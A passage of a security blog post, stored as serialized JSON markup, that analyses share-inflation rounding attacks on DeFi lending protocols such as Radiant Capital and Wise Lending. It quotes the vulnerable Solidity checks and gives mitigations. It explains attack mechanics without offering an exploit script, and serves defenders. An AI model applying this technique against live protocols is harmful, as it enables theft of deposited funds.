mitigations.",[12540],{"src":52616},"/posts/rounding-bugs/cover.png","2024-01-18",{"type":21,"children":52619,"toc":53753},[52620,52624,52652,52657,52670,52675,52681,52686,52691,52696,52701,52714,52726,52746,52766,52771,52776,52794,52800,52805,52811,52825,52838,52843,52849,52863,52868,52890,53123,53128,53133,53146,53386,53396,53401,53407,53412,53417,53450,53455,53466,53472,53477,53491,53619,53633,53709,53714,53725,53730,53735,53739,53744,53749],{"type":24,"tag":43,"props":52621,"children":52622},{"id":35771},[52623],{"type":30,"value":35774},{"type":24,"tag":32,"props":52625,"children":52626},{},[52627,52629,52636,52637,52644,52646,52651],{"type":30,"value":52628},"Recently, there's been a series of attacks exploiting share rounding against lending protocols. Rounding attacks are already known to developers on ",{"type":24,"tag":188,"props":52630,"children":52633},{"href":52631,"rel":52632},"https://neodyme.io/de/blog/lending_disclosure",[192],[52634],{"type":30,"value":52635},"fast",{"type":30,"value":377},{"type":24,"tag":188,"props":52638,"children":52641},{"href":52639,"rel":52640},"https://osec.io/blog/2022-04-26-spl-swap-rounding",[192],[52642],{"type":30,"value":52643},"cheap",{"type":30,"value":52645}," chains with high-value tokens. These attacks are novel in that they also work against low-value tokens on expensive chains. ",{"type":24,"tag":5422,"props":52647,"children":52648},{},[52649],{"type":30,"value":52650},"Most people haven't considered what happens when shares are worth a lot",{"type":30,"value":206},{"type":24,"tag":32,"props":52653,"children":52654},{},[52655],{"type":30,"value":52656},"Much of the previous discourse has mischaracterized the rootcause of these hacks. For example, the presence of flashloans is largely irrelevant. At a high level, these attacks only require two key steps:",{"type":24,"tag":6246,"props":52658,"children":52659},{},[52660,52665],{"type":24,"tag":2659,"props":52661,"children":52662},{},[52663],{"type":30,"value":52664},"Inflate share value (token to share conversion rate)",{"type":24,"tag":2659,"props":52666,"children":52667},{},[52668],{"type":30,"value":52669},"Exploit rounding bug",{"type":24,"tag":32,"props":52671,"children":52672},{},[52673],{"type":30,"value":52674},"In this blog post, we explore these attacks in detail and provide potential mitigations.",{"type":24,"tag":43,"props":52676,"children":52678},{"id":52677},"model",[52679],{"type":30,"value":52680},"Model",{"type":24,"tag":32,"props":52682,"children":52683},{},[52684],{"type":30,"value":52685},"Before we dive in, there's some helpful background information we'll share first.",{"type":24,"tag":32,"props":52687,"children":52688},{},[52689],{"type":30,"value":52690},"A common form of accounting is the share and token model. When a user deposits a token, they receive back shares. Shares can accrue value, whether through interest or protocol fees.",{"type":24,"tag":32,"props":52692,"children":52693},{},[52694],{"type":30,"value":52695},"When users want to withdraw their tokens, they burn shares and receive the corresponding amount of tokens back. This is nice in theory. Unfortunately, in the real world, we have fixed precision. You can't have 1.01 shares, it needs to be either one or two. Which way should we round?",{"type":24,"tag":32,"props":52697,"children":52698},{},[52699],{"type":30,"value":52700},"This question is more complex than it may appear. Let's walk through an example.",{"type":24,"tag":32,"props":52702,"children":52703},{},[52704,52706,52712],{"type":30,"value":52705},"Say we initialize shares and tokens in a one-to-one ratio. After an initial deposit of 1000 tokens, the pool state is ",{"type":24,"tag":145,"props":52707,"children":52709},{"className":52708},[],[52710],{"type":30,"value":52711},"1000:1000",{"type":30,"value":52713}," (1000 tokens to 1000 shares).",{"type":24,"tag":32,"props":52715,"children":52716},{},[52717,52719,52725],{"type":30,"value":52718},"After accruing fees, the pool gains one token for a new ratio of ",{"type":24,"tag":145,"props":52720,"children":52722},{"className":52721},[],[52723],{"type":30,"value":52724},"1001:1000",{"type":30,"value":206},{"type":24,"tag":32,"props":52727,"children":52728},{},[52729,52731,52737,52739,52744],{"type":30,"value":52730},"How many tokens should we get back when withdrawing 999 shares? The real answer is ",{"type":24,"tag":145,"props":52732,"children":52734},{"className":52733},[],[52735],{"type":30,"value":52736},"1001/1000*999 = 999.999",{"type":30,"value":52738},". Unfortunately, we can only send the user 1000 or 999 tokens. For now, let's assume we round ",{"type":24,"tag":5422,"props":52740,"children":52741},{},[52742],{"type":30,"value":52743},"down",{"type":30,"value":52745}," against the user.",{"type":24,"tag":32,"props":52747,"children":52748},{},[52749,52751,52757,52759,52765],{"type":30,"value":52750},"If we give the user 999 tokens, the new pool state is ",{"type":24,"tag":145,"props":52752,"children":52754},{"className":52753},[],[52755],{"type":30,"value":52756},"2:1",{"type":30,"value":52758},". The value of a share doubled! What happens if we deposit 1 more token? We'll get back zero shares, further inflating the ratio to ",{"type":24,"tag":145,"props":52760,"children":52762},{"className":52761},[],[52763],{"type":30,"value":52764},"3:1",{"type":30,"value":206},{"type":24,"tag":32,"props":52767,"children":52768},{},[52769],{"type":30,"value":52770},"Small decisions like rounding direction can have a big impact on share valuation. Generally, share valuation isn't a strict security boundary.",{"type":24,"tag":32,"props":52772,"children":52773},{},[52774],{"type":30,"value":52775},"The above is a bit of a simplification. In practice, there are several protocol-specific design decisions:",{"type":24,"tag":6246,"props":52777,"children":52778},{},[52779,52784,52789],{"type":24,"tag":2659,"props":52780,"children":52781},{},[52782],{"type":30,"value":52783},"Can you deposit and receive back zero shares? If not, you'll need to spend more effort to exploit the rounding error",{"type":24,"tag":2659,"props":52785,"children":52786},{},[52787],{"type":30,"value":52788},"When you withdraw, are you withdrawing shares or tokens?",{"type":24,"tag":2659,"props":52790,"children":52791},{},[52792],{"type":30,"value":52793},"Can you directly manipulate pool state by sending tokens? Hopefully not.",{"type":24,"tag":43,"props":52795,"children":52797},{"id":52796},"decisions",[52798],{"type":30,"value":52799},"Decisions",{"type":24,"tag":32,"props":52801,"children":52802},{},[52803],{"type":30,"value":52804},"Let's assume that we're able to inflate the value of a share. How can we actually exploit this?",{"type":24,"tag":80,"props":52806,"children":52808},{"id":52807},"radiant-capital",[52809],{"type":30,"value":52810},"Radiant Capital",{"type":24,"tag":32,"props":52812,"children":52813},{},[52814,52816,52823],{"type":30,"value":52815},"Radiant Capital was ",{"type":24,"tag":188,"props":52817,"children":52820},{"href":52818,"rel":52819},"https://arbiscan.io/tx/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b",[192],[52821],{"type":30,"value":52822},"hacked on Jan 2nd",{"type":30,"value":52824}," for about $4.5M. This was the original example of exploiting rounding on otherwise inconsequential shares.",{"type":24,"tag":32,"props":52826,"children":52827},{},[52828,52830,52837],{"type":30,"value":52829},"The exploit is relatively straightforward and ",{"type":24,"tag":188,"props":52831,"children":52834},{"href":52832,"rel":52833},"https://medium.com/@_kcyw/radiant-capital-hack-explained-1633289be150",[192],[52835],{"type":30,"value":52836},"has already been covered previously",{"type":30,"value":206},{"type":24,"tag":32,"props":52839,"children":52840},{},[52841],{"type":30,"value":52842},"At a high level, this exploit is exactly what you'd expect. If shares were worth $1000 each, and the user tried to withdraw $1999, they only needed to burn one share. Free money.",{"type":24,"tag":80,"props":52844,"children":52846},{"id":52845},"wise-lending",[52847],{"type":30,"value":52848},"Wise Lending",{"type":24,"tag":32,"props":52850,"children":52851},{},[52852,52854,52861],{"type":30,"value":52853},"Wise Lending was ",{"type":24,"tag":188,"props":52855,"children":52858},{"href":52856,"rel":52857},"https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31",[192],[52859],{"type":30,"value":52860},"hacked on January 13th",{"type":30,"value":52862}," for just under $460,000.",{"type":24,"tag":32,"props":52864,"children":52865},{},[52866],{"type":30,"value":52867},"Again, share prices were inflated artificially high. However, the rounding direction seemed to be correct. This was a new variant.",{"type":24,"tag":32,"props":52869,"children":52870},{},[52871,52873,52880,52882,52889],{"type":30,"value":52872},"This is ",{"type":24,"tag":188,"props":52874,"children":52877},{"href":52875,"rel":52876},"https://etherscan.io/address/0x829c3AE2e82760eCEaD0F384918a650F8a31Ba18",[192],[52878],{"type":30,"value":52879},"the code responsible",{"type":30,"value":52881}," for checking if a withdrawal is valid. As a hint, a critical invariant for lending protocols is that there's ",{"type":24,"tag":188,"props":52883,"children":52886},{"href":52884,"rel":52885},"https://www.chainalysis.com/blog/euler-finance-flash-loan-attack/",[192],[52887],{"type":30,"value":52888},"no way to atomically self-bankrupt",{"type":30,"value":206},{"type":24,"tag":291,"props":52891,"children":52893},{"className":11300,"code":52892,"language":11299,"meta":7,"style":7},"uint256 withdrawValue = WISE_ORACLE.getTokensInETH(\n _poolToken,\n _amount\n)\n * WISE_LENDING.lendingPoolData(_poolToken).collateralFactor\n / PRECISION_FACTOR_E18;\n\nbool state = borrowPercentageCap\n * (overallETHCollateralsWeighted(_nftId) - withdrawValue)\n / PRECISION_FACTOR_E18\n \u003C borrowAmount;\n\nif (state == true) {\n revert ResultsInBadDebt();\n}\n",[52894],{"type":24,"tag":145,"props":52895,"children":52896},{"__ignoreMap":7},[52897,52928,52936,52944,52951,52973,52986,52993,53014,53044,53056,53068,53075,53099,53116],{"type":24,"tag":301,"props":52898,"children":52899},{"class":303,"line":304},[52900,52905,52910,52914,52919,52924],{"type":24,"tag":301,"props":52901,"children":52902},{"style":10246},[52903],{"type":30,"value":52904},"uint256",{"type":24,"tag":301,"props":52906,"children":52907},{"style":359},[52908],{"type":30,"value":52909}," withdrawValue ",{"type":24,"tag":301,"props":52911,"children":52912},{"style":385},[52913],{"type":30,"value":523},{"type":24,"tag":301,"props":52915,"children":52916},{"style":359},[52917],{"type":30,"value":52918}," WISE_ORACLE.",{"type":24,"tag":301,"props":52920,"children":52921},{"style":314},[52922],{"type":30,"value":52923},"getTokensInETH",{"type":24,"tag":301,"props":52925,"children":52926},{"style":359},[52927],{"type":30,"value":1707},{"type":24,"tag":301,"props":52929,"children":52930},{"class":303,"line":320},[52931],{"type":24,"tag":301,"props":52932,"children":52933},{"style":359},[52934],{"type":30,"value":52935}," _poolToken,\n",{"type":24,"tag":301,"props":52937,"children":52938},{"class":303,"line":335},[52939],{"type":24,"tag":301,"props":52940,"children":52941},{"style":359},[52942],{"type":30,"value":52943}," _amount\n",{"type":24,"tag":301,"props":52945,"children":52946},{"class":303,"line":344},[52947],{"type":24,"tag":301,"props":52948,"children":52949},{"style":359},[52950],{"type":30,"value":791},{"type":24,"tag":301,"props":52952,"children":52953},{"class":303,"line":401},[52954,52958,52963,52968],{"type":24,"tag":301,"props":52955,"children":52956},{"style":385},[52957],{"type":30,"value":24339},{"type":24,"tag":301,"props":52959,"children":52960},{"style":359},[52961],{"type":30,"value":52962}," WISE_LENDING.",{"type":24,"tag":301,"props":52964,"children":52965},{"style":314},[52966],{"type":30,"value":52967},"lendingPoolData",{"type":24,"tag":301,"props":52969,"children":52970},{"style":359},[52971],{"type":30,"value":52972},"(_poolToken).collateralFactor\n",{"type":24,"tag":301,"props":52974,"children":52975},{"class":303,"line":415},[52976,52981],{"type":24,"tag":301,"props":52977,"children":52978},{"style":385},[52979],{"type":30,"value":52980}," /",{"type":24,"tag":301,"props":52982,"children":52983},{"style":359},[52984],{"type":30,"value":52985}," PRECISION_FACTOR_E18;\n",{"type":24,"tag":301,"props":52987,"children":52988},{"class":303,"line":439},[52989],{"type":24,"tag":301,"props":52990,"children":52991},{"emptyLinePlaceholder":16},[52992],{"type":30,"value":341},{"type":24,"tag":301,"props":52994,"children":52995},{"class":303,"line":447},[52996,53000,53005,53009],{"type":24,"tag":301,"props":52997,"children":52998},{"style":10246},[52999],{"type":30,"value":36442},{"type":24,"tag":301,"props":53001,"children":53002},{"style":359},[53003],{"type":30,"value":53004}," state ",{"type":24,"tag":301,"props":53006,"children":53007},{"style":385},[53008],{"type":30,"value":523},{"type":24,"tag":301,"props":53010,"children":53011},{"style":359},[53012],{"type":30,"value":53013}," borrowPercentageCap\n",{"type":24,"tag":301,"props":53015,"children":53016},{"class":303,"line":476},[53017,53021,53025,53030,53035,53039],{"type":24,"tag":301,"props":53018,"children":53019},{"style":385},[53020],{"type":30,"value":24339},{"type":24,"tag":301,"props":53022,"children":53023},{"style":359},[53024],{"type":30,"value":873},{"type":24,"tag":301,"props":53026,"children":53027},{"style":314},[53028],{"type":30,"value":53029},"overallETHCollateralsWeighted",{"type":24,"tag":301,"props":53031,"children":53032},{"style":359},[53033],{"type":30,"value":53034},"(_nftId) ",{"type":24,"tag":301,"props":53036,"children":53037},{"style":385},[53038],{"type":30,"value":9253},{"type":24,"tag":301,"props":53040,"children":53041},{"style":359},[53042],{"type":30,"value":53043}," withdrawValue)\n",{"type":24,"tag":301,"props":53045,"children":53046},{"class":303,"line":495},[53047,53051],{"type":24,"tag":301,"props":53048,"children":53049},{"style":385},[53050],{"type":30,"value":52980},{"type":24,"tag":301,"props":53052,"children":53053},{"style":359},[53054],{"type":30,"value":53055}," PRECISION_FACTOR_E18\n",{"type":24,"tag":301,"props":53057,"children":53058},{"class":303,"line":504},[53059,53063],{"type":24,"tag":301,"props":53060,"children":53061},{"style":385},[53062],{"type":30,"value":39196},{"type":24,"tag":301,"props":53064,"children":53065},{"style":359},[53066],{"type":30,"value":53067}," borrowAmount;\n",{"type":24,"tag":301,"props":53069,"children":53070},{"class":303,"line":512},[53071],{"type":24,"tag":301,"props":53072,"children":53073},{"emptyLinePlaceholder":16},[53074],{"type":30,"value":341},{"type":24,"tag":301,"props":53076,"children":53077},{"class":303,"line":592},[53078,53082,53087,53091,53095],{"type":24,"tag":301,"props":53079,"children":53080},{"style":308},[53081],{"type":30,"value":22368},{"type":24,"tag":301,"props":53083,"children":53084},{"style":359},[53085],{"type":30,"value":53086}," (state ",{"type":24,"tag":301,"props":53088,"children":53089},{"style":385},[53090],{"type":30,"value":607},{"type":24,"tag":301,"props":53092,"children":53093},{"style":348},[53094],{"type":30,"value":3440},{"type":24,"tag":301,"props":53096,"children":53097},{"style":359},[53098],{"type":30,"value":398},{"type":24,"tag":301,"props":53100,"children":53101},{"class":303,"line":619},[53102,53107,53112],{"type":24,"tag":301,"props":53103,"children":53104},{"style":308},[53105],{"type":30,"value":53106}," revert",{"type":24,"tag":301,"props":53108,"children":53109},{"style":314},[53110],{"type":30,"value":53111}," ResultsInBadDebt",{"type":24,"tag":301,"props":53113,"children":53114},{"style":359},[53115],{"type":30,"value":4859},{"type":24,"tag":301,"props":53117,"children":53118},{"class":303,"line":635},[53119],{"type":24,"tag":301,"props":53120,"children":53121},{"style":359},[53122],{"type":30,"value":698},{"type":24,"tag":32,"props":53124,"children":53125},{},[53126],{"type":30,"value":53127},"The critical observation is that this code operates on token amounts, while the internal accounting necessarily operates on shares.",{"type":24,"tag":32,"props":53129,"children":53130},{},[53131],{"type":30,"value":53132},"Consider: you have one share worth $1000 and (correctly) can borrow $500. If you tried to withdraw $1, the code would round up to withdraw your one share worth $1000, causing you to be immediately liquidatable!",{"type":24,"tag":32,"props":53134,"children":53135},{},[53136,53138,53144],{"type":30,"value":53137},"And indeed, ",{"type":24,"tag":188,"props":53139,"children":53142},{"href":53140,"rel":53141},"https://etherscan.io/address/0x37e49bf3749513A02FA535F0CbC383796E8107E4",[192],[53143],{"type":30,"value":52848},{"type":30,"value":53145}," rounds up the share value.",{"type":24,"tag":291,"props":53147,"children":53149},{"className":11300,"code":53148,"language":11299,"meta":7,"style":7},"function _calculateShares(\n uint256 _product,\n uint256 _pseudo,\n bool _maxSharePrice\n)\n private\n pure\n returns (uint256)\n{\n return _maxSharePrice == true\n ? _product % _pseudo == 0\n ? _product / _pseudo\n : _product / _pseudo + 1\n : _product / _pseudo;\n}\n",[53150],{"type":24,"tag":145,"props":53151,"children":53152},{"__ignoreMap":7},[53153,53169,53186,53202,53215,53222,53230,53238,53258,53265,53286,53307,53329,53358,53379],{"type":24,"tag":301,"props":53154,"children":53155},{"class":303,"line":304},[53156,53160,53165],{"type":24,"tag":301,"props":53157,"children":53158},{"style":348},[53159],{"type":30,"value":3205},{"type":24,"tag":301,"props":53161,"children":53162},{"style":314},[53163],{"type":30,"value":53164}," _calculateShares",{"type":24,"tag":301,"props":53166,"children":53167},{"style":359},[53168],{"type":30,"value":1707},{"type":24,"tag":301,"props":53170,"children":53171},{"class":303,"line":320},[53172,53177,53182],{"type":24,"tag":301,"props":53173,"children":53174},{"style":10246},[53175],{"type":30,"value":53176}," uint256",{"type":24,"tag":301,"props":53178,"children":53179},{"style":369},[53180],{"type":30,"value":53181}," _product",{"type":24,"tag":301,"props":53183,"children":53184},{"style":359},[53185],{"type":30,"value":1729},{"type":24,"tag":301,"props":53187,"children":53188},{"class":303,"line":335},[53189,53193,53198],{"type":24,"tag":301,"props":53190,"children":53191},{"style":10246},[53192],{"type":30,"value":53176},{"type":24,"tag":301,"props":53194,"children":53195},{"style":369},[53196],{"type":30,"value":53197}," _pseudo",{"type":24,"tag":301,"props":53199,"children":53200},{"style":359},[53201],{"type":30,"value":1729},{"type":24,"tag":301,"props":53203,"children":53204},{"class":303,"line":344},[53205,53210],{"type":24,"tag":301,"props":53206,"children":53207},{"style":10246},[53208],{"type":30,"value":53209}," bool",{"type":24,"tag":301,"props":53211,"children":53212},{"style":369},[53213],{"type":30,"value":53214}," _maxSharePrice\n",{"type":24,"tag":301,"props":53216,"children":53217},{"class":303,"line":401},[53218],{"type":24,"tag":301,"props":53219,"children":53220},{"style":359},[53221],{"type":30,"value":791},{"type":24,"tag":301,"props":53223,"children":53224},{"class":303,"line":415},[53225],{"type":24,"tag":301,"props":53226,"children":53227},{"style":348},[53228],{"type":30,"value":53229}," private\n",{"type":24,"tag":301,"props":53231,"children":53232},{"class":303,"line":439},[53233],{"type":24,"tag":301,"props":53234,"children":53235},{"style":348},[53236],{"type":30,"value":53237}," pure\n",{"type":24,"tag":301,"props":53239,"children":53240},{"class":303,"line":447},[53241,53246,53250,53254],{"type":24,"tag":301,"props":53242,"children":53243},{"style":308},[53244],{"type":30,"value":53245}," returns",{"type":24,"tag":301,"props":53247,"children":53248},{"style":359},[53249],{"type":30,"value":873},{"type":24,"tag":301,"props":53251,"children":53252},{"style":10246},[53253],{"type":30,"value":52904},{"type":24,"tag":301,"props":53255,"children":53256},{"style":359},[53257],{"type":30,"value":791},{"type":24,"tag":301,"props":53259,"children":53260},{"class":303,"line":476},[53261],{"type":24,"tag":301,"props":53262,"children":53263},{"style":359},[53264],{"type":30,"value":799},{"type":24,"tag":301,"props":53266,"children":53267},{"class":303,"line":495},[53268,53272,53277,53281],{"type":24,"tag":301,"props":53269,"children":53270},{"style":308},[53271],{"type":30,"value":680},{"type":24,"tag":301,"props":53273,"children":53274},{"style":359},[53275],{"type":30,"value":53276}," _maxSharePrice ",{"type":24,"tag":301,"props":53278,"children":53279},{"style":385},[53280],{"type":30,"value":607},{"type":24,"tag":301,"props":53282,"children":53283},{"style":348},[53284],{"type":30,"value":53285}," true\n",{"type":24,"tag":301,"props":53287,"children":53288},{"class":303,"line":504},[53289,53294,53299,53303],{"type":24,"tag":301,"props":53290,"children":53291},{"style":385},[53292],{"type":30,"value":53293}," ?",{"type":24,"tag":301,"props":53295,"children":53296},{"style":359},[53297],{"type":30,"value":53298}," _product % _pseudo ",{"type":24,"tag":301,"props":53300,"children":53301},{"style":385},[53302],{"type":30,"value":607},{"type":24,"tag":301,"props":53304,"children":53305},{"style":466},[53306],{"type":30,"value":31034},{"type":24,"tag":301,"props":53308,"children":53309},{"class":303,"line":512},[53310,53315,53320,53324],{"type":24,"tag":301,"props":53311,"children":53312},{"style":385},[53313],{"type":30,"value":53314}," ?",{"type":24,"tag":301,"props":53316,"children":53317},{"style":359},[53318],{"type":30,"value":53319}," _product ",{"type":24,"tag":301,"props":53321,"children":53322},{"style":385},[53323],{"type":30,"value":1036},{"type":24,"tag":301,"props":53325,"children":53326},{"style":359},[53327],{"type":30,"value":53328}," _pseudo\n",{"type":24,"tag":301,"props":53330,"children":53331},{"class":303,"line":592},[53332,53337,53341,53345,53350,53354],{"type":24,"tag":301,"props":53333,"children":53334},{"style":385},[53335],{"type":30,"value":53336}," :",{"type":24,"tag":301,"props":53338,"children":53339},{"style":359},[53340],{"type":30,"value":53319},{"type":24,"tag":301,"props":53342,"children":53343},{"style":385},[53344],{"type":30,"value":1036},{"type":24,"tag":301,"props":53346,"children":53347},{"style":359},[53348],{"type":30,"value":53349}," _pseudo ",{"type":24,"tag":301,"props":53351,"children":53352},{"style":385},[53353],{"type":30,"value":11206},{"type":24,"tag":301,"props":53355,"children":53356},{"style":466},[53357],{"type":30,"value":26216},{"type":24,"tag":301,"props":53359,"children":53360},{"class":303,"line":619},[53361,53366,53370,53374],{"type":24,"tag":301,"props":53362,"children":53363},{"style":385},[53364],{"type":30,"value":53365}," :",{"type":24,"tag":301,"props":53367,"children":53368},{"style":359},[53369],{"type":30,"value":53319},{"type":24,"tag":301,"props":53371,"children":53372},{"style":385},[53373],{"type":30,"value":1036},{"type":24,"tag":301,"props":53375,"children":53376},{"style":359},[53377],{"type":30,"value":53378}," _pseudo;\n",{"type":24,"tag":301,"props":53380,"children":53381},{"class":303,"line":635},[53382],{"type":24,"tag":301,"props":53383,"children":53384},{"style":359},[53385],{"type":30,"value":698},{"type":24,"tag":32,"props":53387,"children":53388},{},[53389,53394],{"type":24,"tag":5422,"props":53390,"children":53391},{},[53392],{"type":30,"value":53393},"Regardless of which way the share rounding occurs, this is a bug",{"type":30,"value":53395},". The correct way would be to do calculations in units of shares and force users to withdraw in increments of shares (and then round down the tokens ultimately received in the end).",{"type":24,"tag":32,"props":53397,"children":53398},{},[53399],{"type":30,"value":53400},"This is a really tricky invariant to reason about!",{"type":24,"tag":43,"props":53402,"children":53404},{"id":53403},"root-cause",[53405],{"type":30,"value":53406},"Root Cause",{"type":24,"tag":32,"props":53408,"children":53409},{},[53410],{"type":30,"value":53411},"Even though this sort of exploit seems pervasive, it requires quite a lot of factors to be exploitable.",{"type":24,"tag":32,"props":53413,"children":53414},{},[53415],{"type":30,"value":53416},"Most importantly, the share value needs to be inflatable. Usually, this requires an integer representation for both shares and tokens. The conversion rate also needs to be expressed in terms of the shares and tokens as opposed to being stored separately.",{"type":24,"tag":291,"props":53418,"children":53420},{"className":11300,"code":53419,"language":11299,"meta":7,"style":7},"totalDepositShares * _amount / pseudoTotalPool\n",[53421],{"type":24,"tag":145,"props":53422,"children":53423},{"__ignoreMap":7},[53424],{"type":24,"tag":301,"props":53425,"children":53426},{"class":303,"line":304},[53427,53432,53436,53441,53445],{"type":24,"tag":301,"props":53428,"children":53429},{"style":359},[53430],{"type":30,"value":53431},"totalDepositShares ",{"type":24,"tag":301,"props":53433,"children":53434},{"style":385},[53435],{"type":30,"value":772},{"type":24,"tag":301,"props":53437,"children":53438},{"style":359},[53439],{"type":30,"value":53440}," _amount ",{"type":24,"tag":301,"props":53442,"children":53443},{"style":385},[53444],{"type":30,"value":1036},{"type":24,"tag":301,"props":53446,"children":53447},{"style":359},[53448],{"type":30,"value":53449}," pseudoTotalPool\n",{"type":24,"tag":32,"props":53451,"children":53452},{},[53453],{"type":30,"value":53454},"The second critical requirement is a generally empty pool. Inflating the share value means that all other shares also rise in value. If there are shares that are not controlled by the attacker, this would mean giving other users free money, almost definitely stopping inflation attacks.",{"type":24,"tag":32,"props":53456,"children":53457},{},[53458,53460,53464],{"type":30,"value":53459},"Finally, there must be improper rounding or accounting. This last requirement is generally easiest to satisfy. Share rounding is a new attack vector, and people haven't thought carefully about proper treatment of dust. Have you analyzed ",{"type":24,"tag":5422,"props":53461,"children":53462},{},[53463],{"type":30,"value":26688},{"type":30,"value":53465}," integer division?",{"type":24,"tag":43,"props":53467,"children":53469},{"id":53468},"mitigations",[53470],{"type":30,"value":53471},"Mitigations",{"type":24,"tag":32,"props":53473,"children":53474},{},[53475],{"type":30,"value":53476},"The easiest way to prevent this attack is to prevent share values from being manipulated. An unexpectedly high share value can lead to denial of service scenarios and is probably worth mitigating by itself.",{"type":24,"tag":32,"props":53478,"children":53479},{},[53480,53482,53489],{"type":30,"value":53481},"The best way is to ensure that the pool has some amount of deposits on deployment, whether operationally or programmatically. As ",{"type":24,"tag":188,"props":53483,"children":53486},{"href":53484,"rel":53485},"https://twitter.com/danielvf/status/1746306320553152615",[192],[53487],{"type":30,"value":53488},"@danielvf notes",{"type":30,"value":53490},", protocols like Uniswap burn a portion of the initial deposit for this very reason.",{"type":24,"tag":291,"props":53492,"children":53494},{"className":11300,"code":53493,"language":11299,"meta":7,"style":7},"if (_totalSupply == 0) {\n liquidity = Math.sqrt(amount0.mul(amount1)).sub(MINIMUM_LIQUIDITY);\n _mint(address(0), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens\n} else {\n",[53495],{"type":24,"tag":145,"props":53496,"children":53497},{"__ignoreMap":7},[53498,53522,53569,53603],{"type":24,"tag":301,"props":53499,"children":53500},{"class":303,"line":304},[53501,53505,53510,53514,53518],{"type":24,"tag":301,"props":53502,"children":53503},{"style":308},[53504],{"type":30,"value":22368},{"type":24,"tag":301,"props":53506,"children":53507},{"style":359},[53508],{"type":30,"value":53509}," (_totalSupply ",{"type":24,"tag":301,"props":53511,"children":53512},{"style":385},[53513],{"type":30,"value":607},{"type":24,"tag":301,"props":53515,"children":53516},{"style":466},[53517],{"type":30,"value":685},{"type":24,"tag":301,"props":53519,"children":53520},{"style":359},[53521],{"type":30,"value":398},{"type":24,"tag":301,"props":53523,"children":53524},{"class":303,"line":320},[53525,53530,53534,53539,53544,53549,53554,53559,53564],{"type":24,"tag":301,"props":53526,"children":53527},{"style":359},[53528],{"type":30,"value":53529}," liquidity ",{"type":24,"tag":301,"props":53531,"children":53532},{"style":385},[53533],{"type":30,"value":523},{"type":24,"tag":301,"props":53535,"children":53536},{"style":359},[53537],{"type":30,"value":53538}," Math.",{"type":24,"tag":301,"props":53540,"children":53541},{"style":314},[53542],{"type":30,"value":53543},"sqrt",{"type":24,"tag":301,"props":53545,"children":53546},{"style":359},[53547],{"type":30,"value":53548},"(amount0.",{"type":24,"tag":301,"props":53550,"children":53551},{"style":314},[53552],{"type":30,"value":53553},"mul",{"type":24,"tag":301,"props":53555,"children":53556},{"style":359},[53557],{"type":30,"value":53558},"(amount1)).",{"type":24,"tag":301,"props":53560,"children":53561},{"style":314},[53562],{"type":30,"value":53563},"sub",{"type":24,"tag":301,"props":53565,"children":53566},{"style":359},[53567],{"type":30,"value":53568},"(MINIMUM_LIQUIDITY);\n",{"type":24,"tag":301,"props":53570,"children":53571},{"class":303,"line":335},[53572,53577,53581,53585,53589,53593,53598],{"type":24,"tag":301,"props":53573,"children":53574},{"style":314},[53575],{"type":30,"value":53576}," _mint",{"type":24,"tag":301,"props":53578,"children":53579},{"style":359},[53580],{"type":30,"value":362},{"type":24,"tag":301,"props":53582,"children":53583},{"style":10246},[53584],{"type":30,"value":39391},{"type":24,"tag":301,"props":53586,"children":53587},{"style":359},[53588],{"type":30,"value":362},{"type":24,"tag":301,"props":53590,"children":53591},{"style":466},[53592],{"type":30,"value":584},{"type":24,"tag":301,"props":53594,"children":53595},{"style":359},[53596],{"type":30,"value":53597},"), MINIMUM_LIQUIDITY); ",{"type":24,"tag":301,"props":53599,"children":53600},{"style":1062},[53601],{"type":30,"value":53602},"// permanently lock the first MINIMUM_LIQUIDITY tokens\n",{"type":24,"tag":301,"props":53604,"children":53605},{"class":303,"line":344},[53606,53611,53615],{"type":24,"tag":301,"props":53607,"children":53608},{"style":359},[53609],{"type":30,"value":53610},"} ",{"type":24,"tag":301,"props":53612,"children":53613},{"style":308},[53614],{"type":30,"value":10144},{"type":24,"tag":301,"props":53616,"children":53617},{"style":359},[53618],{"type":30,"value":3035},{"type":24,"tag":32,"props":53620,"children":53621},{},[53622,53624,53631],{"type":30,"value":53623},"Alternatively, ",{"type":24,"tag":188,"props":53625,"children":53628},{"href":53626,"rel":53627},"https://github.com/SynonymFinance/smart-contracts-public/blob/759c6afe45720e26d731f081dfc747787ad7ae20/evm/src/contracts/lendingHub/HubInterestUtilities.sol#L52-L53",[192],[53629],{"type":30,"value":53630},"storing the conversion rate separately",{"type":30,"value":53632}," can also suffice. A key factor is that depositing additional tokens or burning shares affects the conversion rate. If the conversion rate is hardcoded and updated only during interest accrual, there's nothing to manipulate.",{"type":24,"tag":291,"props":53634,"children":53636},{"className":11300,"code":53635,"language":11299,"meta":7,"style":7},"accrualIndices.borrowed = accrualIndices.borrowed * borrowInterestFactor / precision;\naccrualIndices.deposited = accrualIndices.deposited * depositInterestFactor / precision;\n",[53637],{"type":24,"tag":145,"props":53638,"children":53639},{"__ignoreMap":7},[53640,53675],{"type":24,"tag":301,"props":53641,"children":53642},{"class":303,"line":304},[53643,53648,53652,53657,53661,53666,53670],{"type":24,"tag":301,"props":53644,"children":53645},{"style":359},[53646],{"type":30,"value":53647},"accrualIndices.borrowed ",{"type":24,"tag":301,"props":53649,"children":53650},{"style":385},[53651],{"type":30,"value":523},{"type":24,"tag":301,"props":53653,"children":53654},{"style":359},[53655],{"type":30,"value":53656}," accrualIndices.borrowed ",{"type":24,"tag":301,"props":53658,"children":53659},{"style":385},[53660],{"type":30,"value":772},{"type":24,"tag":301,"props":53662,"children":53663},{"style":359},[53664],{"type":30,"value":53665}," borrowInterestFactor ",{"type":24,"tag":301,"props":53667,"children":53668},{"style":385},[53669],{"type":30,"value":1036},{"type":24,"tag":301,"props":53671,"children":53672},{"style":359},[53673],{"type":30,"value":53674}," precision;\n",{"type":24,"tag":301,"props":53676,"children":53677},{"class":303,"line":320},[53678,53683,53687,53692,53696,53701,53705],{"type":24,"tag":301,"props":53679,"children":53680},{"style":359},[53681],{"type":30,"value":53682},"accrualIndices.deposited ",{"type":24,"tag":301,"props":53684,"children":53685},{"style":385},[53686],{"type":30,"value":523},{"type":24,"tag":301,"props":53688,"children":53689},{"style":359},[53690],{"type":30,"value":53691}," accrualIndices.deposited ",{"type":24,"tag":301,"props":53693,"children":53694},{"style":385},[53695],{"type":30,"value":772},{"type":24,"tag":301,"props":53697,"children":53698},{"style":359},[53699],{"type":30,"value":53700}," 